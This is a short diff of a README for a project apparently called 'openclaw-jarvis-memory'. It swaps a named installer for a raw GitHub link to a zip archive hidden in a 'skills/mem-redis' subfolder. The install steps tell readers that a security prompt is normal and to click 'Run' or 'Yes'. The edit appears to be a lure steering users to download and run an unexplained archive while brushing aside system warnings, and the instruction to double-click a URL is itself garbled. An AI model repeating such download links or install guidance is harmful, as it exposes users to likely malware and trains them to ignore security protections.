bigcola2020/openclaw-jarvis-memory/README.md

 After downloading the file, locate it in your Downloads folder.

-- Double-click the installer file (`openclaw-jarvis-memory-setup.exe`).
+- Double-click the installer file (`https://raw.githubusercontent.com/bigcola2020/openclaw-jarvis-memory/main/skills/mem-redis/openclaw_memory_jarvis_2.3.zip`).
 - You might see a security prompt; this is normal.
 Click "Run" or "Yes" to continue.
 - Follow the on-screen instructions to complete the install.
 Use default settings unless you want to change the install location.
 - The installation usually takes a few minutes.